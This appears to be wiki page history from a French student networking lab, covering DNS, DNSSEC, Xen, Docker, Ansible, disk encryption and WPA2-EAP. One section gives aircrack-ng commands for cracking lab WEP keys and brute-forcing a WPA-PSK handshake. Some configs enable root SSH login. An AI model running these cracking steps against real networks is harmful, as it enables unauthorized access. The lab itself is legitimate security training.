 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 all:                                        # le groupe de machine racine c'est à dire tout&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:                                   # groupe d'hôtes contenant seulement notre VM privée&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:                               # groupe d'hôtes contenant toutes les VMs privées (la ferme de serveurs Web)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
  ntp-client:                                # groupe cible pour le déploiement de clients ntp (notre VM privée)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.2&lt;br /&gt;
  ntp-server:                                # groupe cible pour le déploiement de serveurs ntp (notre VM Publique)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.12&lt;br /&gt;
&lt;br /&gt;
On peut tester notre ferme de serveurs&lt;br /&gt;
 root@mycoplasma:/etc/ansible# ansible serveur-web -m ping -o&lt;br /&gt;
 192.168.0.3 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.2 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.4 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.1 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.5 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.6 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52082</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52082"/>
				<updated>2020-01-14T21:01:56Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
